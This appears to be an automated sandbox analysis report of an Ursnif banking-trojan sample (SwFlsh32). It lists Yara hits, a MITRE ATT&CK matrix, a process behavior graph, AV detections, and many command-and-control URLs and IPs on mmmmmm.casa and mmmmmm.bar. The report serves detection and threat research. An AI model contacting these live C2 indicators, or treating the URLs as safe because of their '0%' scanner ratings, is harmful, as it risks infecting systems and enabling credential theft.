            Source: Yara matchFile source: 00000003.00000002.873845107.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370682268.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377701167.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.525325990.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377849557.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.871575841.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375719746.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413508620.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377869270.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377814213.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370731881.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413551793.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375909820.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377887122.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375980649.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.525785355.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413562057.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377730405.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.522435374.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370523422.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370634510.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370551319.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413469441.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413590499.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413446258.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.872902084.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.874384874.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377774023.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6936, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.375865630.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375941264.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413490977.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375998345.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375960218.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413537323.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.376010591.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370670581.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370609933.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370654960.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.456592499.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.873845107.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370682268.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377701167.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.525325990.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377849557.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.871575841.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375719746.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413508620.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377869270.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377814213.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370731881.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413551793.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375909820.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377887122.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.375980649.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.525785355.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413562057.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377730405.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.522435374.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370523422.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370634510.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370551319.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413469441.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413590499.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.413446258.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.872902084.0000000005748000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.874384874.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.377774023.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6888, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6936, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsNative API12Boot or Logon Initialization ScriptsProcess Injection112Software Packing1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery114Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncVirtualization/Sandbox Evasion11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 551599 Sample: SwFlsh32.exe Startdate: 12/01/2022 Architecture: WINDOWS Score: 100 67 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->67 69 Found malware configuration 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 2 other signatures 2->73 7 loaddll32.exe 7 2->7         started        11 iexplore.exe 2->11         started        13 iexplore.exe 2->13         started        15 3 other processes 2->15 process3 dnsIp4 61 www.mmmmmm.casa 7->61 63 mmmmmm.casa 7->63 65 2 other IPs or domains 7->65 85 Found evasive API chain (may stop execution after checking system information) 7->85 87 Found API chain indicative of debugger detection 7->87 89 Writes or reads registry keys via WMI 7->89 91 Writes registry values via WMI 7->91 17 cmd.exe 1 7->17         started        19 regsvr32.exe 6 7->19         started        23 rundll32.exe 6 7->23         started        31 4 other processes 11->31 33 4 other processes 13->33 25 iexplore.exe 31 15->25         started        27 iexplore.exe 29 15->27         started        29 iexplore.exe 29 15->29         started        35 5 other processes 15->35 signatures5 process6 dnsIp7 37 rundll32.exe 6 17->37         started        45 2 other IPs or domains 19->45 75 Writes or reads registry keys via WMI 19->75 77 Writes registry values via WMI 19->77 47 2 other IPs or domains 23->47 79 System process connects to network (likely due to code injection or exploit) 23->79 41 mmmmmm.bar 31.41.45.66, 49764, 49765, 49766 ASRELINKRU Russian Federation 25->41 43 mmmmmm.casa 162.255.119.219, 49784, 49785, 49846 NAMECHEAP-NETUS United States 31->43 49 3 other IPs or domains 31->49 51 3 other IPs or domains 33->51 53 2 other IPs or domains 35->53 signatures8 process9 dnsIp10 55 www.mmmmmm.casa 37->55 57 mmmmmm.casa 37->57 59 2 other IPs or domains 37->59 81 System process connects to network (likely due to code injection or exploit) 37->81 83 Writes registry values via WMI 37->83 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SwFlsh32.dll47%VirustotalBrowse
            SwFlsh32.dll21%MetadefenderBrowse
            SwFlsh32.dll33%ReversingLabsWin32.Trojan.Ursnif

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.2.regsvr32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            3.1.rundll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            0.2.loaddll32.exe.34f0000.2.unpack100%AviraHEUR/AGEN.1108158Download File
            4.2.rundll32.exe.51e0000.2.unpack100%AviraHEUR/AGEN.1108158Download File
            4.2.rundll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            2.2.regsvr32.exe.4b90000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            3.2.rundll32.exe.fa0000.1.unpack100%AviraHEUR/AGEN.1108158Download File
            4.1.rundll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            3.2.rundll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://mmmmmm.bar/drew/rYhpfv40P_2B7t/Bl8Jpz3HikWQQZ2Mkwk0t/ZQh_2BBYynk_2B4t/DqzVN_2FWUQJJOS/_2FaWtf0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/vdHEwGKNJDH5VthHkA9T/Z5WmkGRrBb11dvjiUNh/WxiZR4Pd4dpgWoud6Glfdx/X118IwtCBnG_2/B_2FIObD/HoDAL_2BFA8fwdPCks8bPvx/KOXH_2BIls/0Ry3fQgmhQH2tjL21/2VvKLDjxl_2B/D5jMgG7YliQ/d_2BQm9szBxhpm/DMhMK7yZ4LHz0oSIUsdVm/PE52_2F_2BI5AnjM/Vyp3_2BWfI5OR9d/6JhumiV_2BTYaEtfro/p8Q9LLFcC/ep5xT7x.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt0Nd7sD_2F4b/bp9jUjPyXDdZc_2FK0v/dPnfT6KZCI_2F04UJ3vQAP/bumYKjymhbjDK/LPqhtKzi/PG6vU8VyOAfE3kJoq_2FnmQ/686tSvRTaO/HG7aazopIFs0YU1L8/w3MPLoFg4vJR/s_2F_2F3_2F/eZehSHb27f_2Ff/LvnuNMT1_2BI6YAzztnWs/g1WQ4.jlk0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/gX1_2FaI/PZ4luFioJpYPLuP8fVvt_2B/u_2B1y278F/NyvoV4yhw5FMBnKUz/nqgst_2BJTVr/gmszek7Tkgw/kY3_2Frm_2B9_2/Bt5smOqRl_2FbHG9pJMQ9/_2FSApE07JWo12ge/_2F2lc5upYPyphr/TuywFSg0WDyPNAgaSh/_2FSvG_2F/Irt_2BKEJPDAlX_2BG1S/CGpR1M06n3G6vhLO6R2/IxroSYxc7NGtcASjzUaI4b/fIQXTVLEVzFOr/XmDvptqg/KWMc56Q.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp/K54vFYEC/gSMgbh5hTjYukOrn_2FVtVO/kxbD7685pw/D6liknAe3SgFx3Zau/fgTRypCpGd6_/2BWwzsFNUTB/kStLFMMJ2IT7_2/BrT00EK5bT2hx2ArBEpna/rJhHQ0GHmwXcGhAL/bY32sGH8COFYlAi/7c_2BXCEC2TYVlC_2B/RMiaKI.jlk0%Avira URL Cloudsafe
            http://mmmmmm.casa/0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/cD2Ewm7iGqMWPOkoVh2Hr/lSdxksgYA4mJEN42/6hG4ODNyYAH539U/3fuQQ5LlKDI4bM1b7W/id0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/eEhDmx0a4sdxsRnzPb9hc_2/BoO73Mi9GS/E9f2sOeyD62Bdbz85/pt5vTSpE5LaM/nbIIyujSEBL/OmFR25OlsOla5R/ZGIaEVBjF1eXghMwWqveY/rQjeZF8gVJNH3wHy/B973Qo6ad87bmri/ALD9b8z1P4fLtB7RV6/Qjdo70DfW/fYp2gHONnSJbyqTal3v4/rek0g25YOLcyy_2F69M/9AiJkZF0rkPrM3t880NzXZ/UtPjpWudU/GCl.jlk0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/KIltLLac3s45S6I2s/_2B1Wqc_2B5c/EKy4c6iVcGr/roEVoEtc4s6KJG/LaHr2aqiVSiSI_2F6e0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0re0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/eEhDmx0a4sdxsRnzPb9hc_2/BoO73Mi9GS/E9f2sOeyD62Bdbz85/pt5vTSpE5LaM/nbIIyujSEBL0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/hM1upiDM4s78JFaPrfyW/3DWkoBXDYr7rgMt3xG_/2BGXIAeEHHsslby_2Fk_2B/XjQKcdsES34ik0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0XyTBo/7JNgQsItTPD2PHGzNKS/G1LTW9fRAA1zfD6_2FMiYB/dg960muYkdAwp/uG8HwcGL/8jG_2BjlGKWZrDL8vqOPVvC/htJk0fRuFB/CZluWe0HHNShwo8us/H7tsPluCA75g/aX_2F3vI3Tj/WjN30iGXtvxagL/uXBGZL_2FYgMxgH/PfB0165.jlk0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/JYo2yh7o/xmmHqBu82xYT0h_2FY7FLhd/BDSs1jeYDH/q9Uyq_2F_2F5Uhp3O/kDGBT1_2BMID/BPHuX8lkP85/MSE547sPVJP5Pb/uwpVWJ0_2F5KAGhPt59PK/XFYRWXuuFJDH1RPV/x9jUEqFvAJ3Kl42/dFOyZtqdeFkK81krpt/W07rXA9LO/_2FsUQUJNXTJZ08M4MsS/eUndP8BPShJYYavS5w3/OjNnZSisYNeZZTRn2Bu4BT/d35KR5_2FpO/eKZ.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZ0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I9teP0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/f70%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0reJ/M_2BEvg2/n0SUz7ABMgvByMjQHGo4C6V/y6up15FMoS/me3cGYElCp7gjn9mK/XokkgVSPvUEl/9Xh7nBhTNUv/Hu_2FLYCoGylTE/PAnBqftN_2BClsXZ5c30E/LSE6DqmQJKuNMLsT/jIeReNc_2FrwuiM/c415zPXdTdLNE1JVmB/3gOOzGBic4F_2/B.jlk0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/EvNJYH1hit_2B/S_2FBSev/L6PRTXShrXbJ8nSbnHyL3kk/rxSkNCwe_2/FwMR5MuV_2Fgl3qPB/c0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3Hv0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/HtkON_2B7z6GBNJYyD4I3/xRuj4RA80G1xgwTe/6DMbifikIm_2FM8/00fCpSw_2FispEHnQv/ay_2F3gE3/oOYKJzhDJmDqsnndqRcm/WimAvUhteSw_2Fc93Cu/LsTVjCaCiit8lBp6cr3LHW/NUGnS2o0K1GIO/9DztPR6y/1wL4WK52CrQNl9GkBoK3y4y/0UMaajSHs_/2BFHmnnBnM3vSdJ5q/fZPNMnsQSSSV/F839oKXvjNu/zBM1z_2BEUjAtZ/n.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/5Ri10%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/9kTn9nma9POHJpkr1Icf/OLGAIzVWdaryEbrg0Mm/vcdVt58PgZbFgFujCibxQS/kcDoJIO3wyYVp0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/yX2jPs_2FJk7BOaoQtgEiU6/nNQbGh1LU5/204V5EdINWf_2Fd_2/Byf2ExfvNDDz/y_2Fb3qYGFh0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/IVKP_2B6ZQQkG6g5/gfowffZhbmtN_2B/GZbbScWLQtb1lACgnt/rBntiTQwT/saL_2BBlUn86jR0XyTBo/7JNgQsItTPD2PHGzNKS/G1LTW9fRAA1zfD6_2FMiYB/dg960muYkdAwp/uG8HwcGL/8jG_2BjlGKWZrDL8vqOPVvC/htJk0fRuFB/CZluWe0HHNShwo8us/H7tsPluCA75g/aX_2F3vI3Tj/WjN30iGXtvxagL/uXBGZL_2FYgMxgH/PfB0165.jlk0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/6V2kcoNh5zlkLfQFPc/BK1xvKoki/sI2xcD400Cdl5_2BfFpM/88ymBYA3Lf0RW9scFqJ/hZxCNouRVbWyD_2BA0kUFL/Azh_2F37QJ8w5/_2F_2BHJ/YF_2B05Ux0nGHzUMeX6_2Be/Gj4AjkO056/z7zfXvOS0Ck9ij1T9/ivOOUShQT_2F/O9VYsyMhlJb/T4tSNfoaQI67_2/FGgXNRDCGCG5WTW5VVa0g/XJjtgZS8MSjTGuOi/Remmz7x4_2BJS/95Bf3HvZ/j.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/O89kIoYukkHw2iqX/AhMjsf0VV5QFYgZ/kFHoGSUTql5nMATTez/zlGIspUJ0/j76OVsrTt00%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/QBjwt7f9IP4GJ_2FI3i/c0aa6REvsF1jEZ9Gt73OXW/MtCcAk2KHvQUZ/TFCEWwi_/2FYGGLslYtr0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/iTPgFkMUiWF_2Fj_2BXJ/eLS5m_2F0RHDMK53bDw/qXYPEpap6CC0ju_2FKvxUJ/BgKiBRJZA0reJ/M_2BEvg2/n0SUz7ABMgvByMjQHGo4C6V/y6up15FMoS/me3cGYElCp7gjn9mK/XokkgVSPvUEl/9Xh7nBhTNUv/Hu_2FLYCoGylTE/PAnBqftN_2BClsXZ5c30E/LSE6DqmQJKuNMLsT/jIeReNc_2FrwuiM/c415zPXdTdLNE1JVmB/3gOOzGBic4F_2/B.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/Gbrj1v9f6rwpYUn6Y/0ESxqmC4O7HZ/1pIQZKpC23v/OvNjMXTiBqucS2/OdUDj2hxo5EF8I0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/j7oozYYr4G/bYPRbLJriJS4feBdG/0xgI6EEeE0Qo/2gCtlKjoc_2/B1hFK5PzTlAsos/iTaAVzPWNav1dGzFBSySy/UxAr96PjZyJmtdFK/fjXwxJmbivWIGIY/yq5Vv8AYxEn49XkMGs/TubtjJpWE/75uowT9qAGrZ7hMQc0Ie/MC9oDaNtwMfoejZWEbQ/liHrTgwmRg6JEzsf_2FWS5/OEyBJ8_2Ft152/RzvfDI58/dRQYeFOH3wNaXYh/y.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/f6jKcEUOj8A64/WvqMDEXc/MwmCt7DFVgxdimBO2LgEA0N/ZNXLxEI3Zd/gyEG1BIXvosDrJ0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/QlXIpR0wndbmqlxV0/E1uaBwmWK3WR/XxTfKB75z9_/2F5qjg8wQ5TOnj/tny31CDfamMmuOmtnZ4BO/UrGwEYls5FZr9NOY/qBNRjkAx6JKLl3C/amPvvbpTDPW7l1_2BG/AkIItPcFA/_2BWYnRk9w6cYY0vPsq_/2Br9VFrr411VhgRrDxy/3F_2F7Vlikg4vzRKtAZQJk/l22Naqdec_2BZ/8xjrpB_2/BXmlJcOnZaQy5f8DKHbbt25/ZVw8ezvEsm/bjxITdWRcsoO365Ol39e8/c.jlk0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlk0%Avira URL Cloudsafe
            http://mmmmmm.casa/drew/8VlHKrhhwaO4MOJ/f3EmmfXBW3D8HUpBCo/swchfzgV4/yHkfNEa_2Fwt2XYdacLI/ABkGMMt3HvRTK_2Bqqu/gzjGRx7KB_2F1RoftA_2Fz/PEgtk6sAU_2FI/SoLiX7_2/F6nF3_2FX_2FL_2BPA9VAJE/2ti_2BjF22/eWsy2b94EnkcAywCn/SePiZqRhG0KC/J9h54_2FXsX/_2BAYiFGvma0Ov/TOZ2z9V2mUHL5ZKiKLNfv/GDzWsuuy7dOH1Ahu/VU35hjTe/i6_2F.jlk0%Avira URL Cloudsafe
            http://www.mmmmmm.casa/drew/34vM2Qz4NrxAJPso/55_2BO7dEpmqKKz/UfdYfTV2D9XUJnIX4u/wEi6o1JYk/kRFDZ6mK40EWlsc6Lw5w/mDVFZVW_2F8m7wnjZkk/bWWghhS_2BpKqwr_2FiGlA/mVW8Mpa2fncUu/9kKvVeUJ/1ENXmn00HlfSkjkGGDRsgIQ/xo_2FicWeq/xi1wE7iI0t8C7Pb_2/B0cr_2Fh2Ic_/2BR5T0WLYrL/GDbKM8aDkZ5B8k/D7fVec54KHjYVnHWNjgpP/2UWjy_2BZuxTwv24/xnHIqz6W2/M.jlk0%Avira URL Cloudsafe
            http://mmmmmm.bar/drew/pqebeo2lGkpXDanz/ytpUleK_2FpNL5M/WaawzvJzKNJXUgj1ad/bF_2B89Mv/JS92dYGkqfVf3KA0%Avira URL Cloudsafe
